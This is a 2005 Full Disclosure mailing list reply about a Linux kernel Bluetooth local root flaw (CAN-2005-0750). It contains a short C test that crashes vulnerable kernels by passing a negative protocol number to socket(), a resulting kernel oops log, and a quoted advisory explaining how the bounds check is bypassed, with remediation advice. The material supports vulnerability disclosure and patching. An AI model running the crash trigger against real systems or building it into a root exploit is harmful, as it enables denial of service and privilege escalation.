Full Disclosure mailing list archives
Re: local root security bug in linux >= 2.4.6 <= 2.4.30-rc1 and 2.6.x.y <= 2.6.11.5
From: "KF (Lists)" <kf_lists () digitalmunition com>
Date: Sun, 27 Mar 2005 16:14:50 -0500
This should be enough to determine if you are at 'potential' risk or not. I have not tested his work around so I can not vouch for it.
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
main()
{
int ctl;
/* Open HCI socket */
if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0)
{
perror("Can't open HCI socket.");
exit(1);
}
}
Mar 27 16:12:23 jdam kernel: <1>Unable to handle kernel paging request
at virtual address 5f5f0073
Mar 27 16:12:23 jdam kernel: d7a2c098 Mar 27 16:12:23 jdam kernel: PREEMPT Mar 27 16:12:23 jdam kernel: CPU: 0Mar 27 16:12:23 jdam kernel: EIP: 0060:[__crc_dq_data_lock+94252/3474916] Not tainted
Mar 27 16:12:23 jdam kernel: EFLAGS: 00210206 (2.6.8-2-386) Mar 27 16:12:23 jdam kernel: EIP is at bt_sock_create+0x40/0xd5 [bluetooth]Mar 27 16:12:23 jdam kernel: eax: 5f5f0063 ebx: fffffba9 ecx: ccf2f624 edx: d7a36980 Mar 27 16:12:23 jdam kernel: esi: ccf2f600 edi: ffffffa3 ebp: ffffff9f esp: c49fdf30
Mar 27 16:12:23 jdam kernel: ds: 007b es: 007b ss: 0068Mar 27 16:12:23 jdam kernel: Process test (pid: 364, threadinfo=c49fc000 task=cd4b1440) Mar 27 16:12:23 jdam kernel: Stack: 0000001f ccf2f600 00000001 c01f82f5 ccf2f600 fffffba9 00000000 00000001 Mar 27 16:12:23 jdam kernel: bffff8dc c49fc000 c01f83fb 0000001f 00000003 fffffba9 c49fdf84 00000000 Mar 27 16:12:23 jdam kernel: c01f8430 0000001f 00000003 fffffba9 c49fdf84 00000003 00000000 c01f9015
Mar 27 16:12:23 jdam kernel: Call Trace:Mar 27 16:12:23 jdam kernel: [__sock_create+279/518] __sock_create+0x117/0x206
Mar 27 16:12:23 jdam kernel: [sock_create+23/27] sock_create+0x17/0x1b Mar 27 16:12:23 jdam kernel: [sys_socket+22/60] sys_socket+0x16/0x3cMar 27 16:12:23 jdam kernel: [sys_socketcall+88/384] sys_socketcall+0x58/0x180
Mar 27 16:12:23 jdam kernel: [do_page_fault+0/1183] do_page_fault+0x0/0x49f Mar 27 16:12:23 jdam kernel: [error_code+45/56] error_code+0x2d/0x38 Mar 27 16:12:23 jdam kernel: [syscall_call+7/11] syscall_call+0x7/0xbMar 27 16:12:23 jdam kernel: Code: 8b 50 10 85 d2 be 01 00 00 00 74 33 b8 00 e0 ff ff 21 e0 ff
-KF Rob wrote:
advisories wrote:Hi,We recently discovered a security bug in the bluetooth stack of the linux kernel. This affects most linux kernels (provided that the bluetooth stack is used).More information can be found in the attached pdf file. Regards, The suresec team.I "discovered" this text in the attachment: Suresec security advisory 1 Release date: 27th March 2005 CVE ID: CAN-2005-0750 Linux kernel local root vulnerability About the linux kernel: The linux kernel is a widely used kernel which is unix based. Vulnerability summary: The linux kernel has support for bluetooth. A local root security vulnerability was found in this bluetooth stack. Vulnerable code: static int bluez_sock_create(struct socket *sock, int proto) { if (proto >= BLUEZ_MAX_PROTO) return -EINVAL; ... return bluez_proto[proto]->create(sock, proto); } This code can be reached by either calling socket() or alternativly calling socketpair(). When passed a negative value for the protocol the bounds check can be bypassed. Later the protocol number is used as an index to a function pointer. It is possible to use proto as an index to some kind of memory that is under a user's control. Impact: When properly exploited this yields local root. (exploitation is trivial) Affected versions: This vulnerability affects all 2.6.x(.y) <= 2.6.11.5 linux kernels and >= 2.4.6 <= 2.4.30-rc1kernels provided that there is support for bluetooth. Suggested Recommendations: Update your kernel to a newer one, or alternativly we've made a loadable kernel modules which works around the problem by checking the protocol and domain before the bluetooth socket code is called. It can be found at: http://www.suresec.org/tools/bluetooth_workaround.tar.gz Credits: Ilja van Sprundel found this vulnerability. About us: Suresec Ltd is a global service provider of Internet security solutions and consultancy with unmatched quality from our world class consultancy practice. Our consultants have pioneered in the field of security research and have closely worked with leading software companies and service providers to mitigate risks and fix a number of critical vulnerabilities, suresec also works closely with a number of open source companies to provide them with a source code auditing and technical consultancy. We have a strong team consultants spread across Europe, the United States and Australia specializing in security consulting. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- local root security bug in linux >= 2.4.6 <= 2.4.30-rc1 and 2.6.x.y <= 2.6.11.5 advisories (Mar 27)
- Re: local root security bug in linux >= 2.4.6 <= 2.4.30-rc1 and 2.6.x.y <= 2.6.11.5 Rob (Mar 27)
- Re: local root security bug in linux >= 2.4.6 <= 2.4.30-rc1 and 2.6.x.y <= 2.6.11.5 KF (Lists) (Mar 27)
- Re: local root security bug in linux >= 2.4.6 <= 2.4.30-rc1 and 2.6.x.y <= 2.6.11.5 Rob (Mar 27)